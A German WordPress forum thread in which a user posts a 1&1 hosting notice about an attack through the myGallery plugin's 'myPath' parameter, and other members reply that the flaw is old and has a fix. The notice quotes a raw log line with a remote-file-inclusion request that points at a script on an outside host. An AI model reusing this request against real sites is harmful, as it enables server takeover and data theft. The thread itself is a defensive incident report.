1. Herzlich willkommen bei WPDE.org, dem grössten und ältesten deutschsprachigen Community-Forum rund um das Thema WordPress. Du musst angemeldet oder registriert sein, um Beiträge verfassen zu können.
    Information ausblenden

Crackversuch über myGallerie und WP 2.2.3

Dieses Thema im Forum "Allgemeines" wurde erstellt von sliver, 6. November 2007.

  1. sliver

    sliver Member

    Registriert seit:
    6. November 2007
    Beiträge:
    15
    Zustimmungen:
    0
    Sehr geehrter Herr …,

    wir registrierten vor kurzem einen Crackversuch auf unseren Servern, der
    von Ihrer Präsenz ausging. Der Angreifer versuchte, sich durch
    Sicherheitslücken in den von Ihnen verwendeten Scripten Zugriff zum
    Server zu verschaffen. Es ist davon auszugehen, dass der Angreifer
    Zugriff auf Ihre Daten erhalten konnte.

    Bitte prüfen Sie die Inhalte Ihrer Präsenz und ändern Sie Ihre
    Passwörter. Wir empfehlen Ihnen, schnellstmöglich Ihre Scripte zu
    überarbeiten, um solche Probleme so weit wie möglich auszuschliessen.

    Es handelt sich um das Script
    "/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php",
    welches über den Parameter "myPath" die Ausführung beliebigen Codes
    erlaubt:

    207.44.232.99 - - [05/Nov/2007:20:00:22 +0100] "GET
    /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=ht
    tp://holymusic.org/ver_2006/img/fq.txt? HTTP/1.1" 200 913
    Ihre URL "-" "libwww-perl/5.808" "-"

    Wir haben das PHP-Feature `allow_url_fopen' für das entsprechende
    Verzeichnis deaktiviert. Trotzdem empfehlen wir, das Script zu
    überarbeiten.

    Wir empfehlen Ihnen sich regelmäßig über Updates aller installierten
    Software zu informieren, z.B. über entsprechende Announce-Mailinglisten
    oder Foren des Herstellers. Insbesondere gilt dies auch für die
    Komponenten von Drittherstellern der verwendeten Applikationen. Diese
    sind mittlerweile ein gängiges Angriffsziel. Es werden mit Updates
    teilweise auch Lücken geschlossen, die nicht in den Release-Notes der
    Software verzeichnet sind. Verwenden Sie lediglich Programme aus
    vertrauenswürdigen Quellen.

    Falls Sie selbstgeschriebene Scripte einsetzen, dann dürfte folgender
    Artikel ebenfalls von Interesse für Sie sein:
    1&1 Hilfe-Center

    --
    Mit freundlichen Grüßen,

    Ingvar Gilbert
    1&1 WebHosting

    1&1 Internet AG
    Brauerstraße 48
    76135 Karlsruhe

    Amtsgericht Montabaur HRB 6484

    Vorstand: Henning Ahlert, Ralph Dommermuth, Matthias Ehrlich, Andreas
    Gauger, Matthias Greve, Robert Hoffmann, Norbert Lang, Achim Weiss
    Aufsichtsratsvorsitzender: Michael Scheeren
     
  2. jottlieb

    jottlieb Well-Known Member
    Ehrenmitglied

    Registriert seit:
    20. August 2005
    Beiträge:
    17.381
    Zustimmungen:
    0
    Und nun?



    ....
     
  3. Alphawolf

    Alphawolf Well-Known Member
    Ehrenmitglied

    Registriert seit:
    31. Mai 2005
    Beiträge:
    3.315
    Zustimmungen:
    0
    Nun preiset 1und1 für den tollen Support. :)
     
  4. Nobbi

    Nobbi Well-Known Member

    Registriert seit:
    23. Oktober 2004
    Beiträge:
    599
    Zustimmungen:
    0
  5. tboley

    tboley Well-Known Member

    Registriert seit:
    27. Oktober 2005
    Beiträge:
    1.178
    Zustimmungen:
    0
    Ich kann mich Nobbi nur anschließen - das Thema ist bald ein 3/4 Jahr alt (und seit dem gibt es auch eine sichere Version), und wurde zumindest bei mir im Blog ausführlich diskutiert.

    Es tut mir natürlich wahnsinnig leid, dass ich nicht jeden User von myGallery persönlich zu Hause besuche, und auf eine neu Version von myGallery hinweise...
     
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden
  1. Diese Seite verwendet Cookies, um Inhalte zu personalisieren, diese deiner Erfahrung anzupassen und dich nach der Registrierung angemeldet zu halten.
    Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies.
    Information ausblenden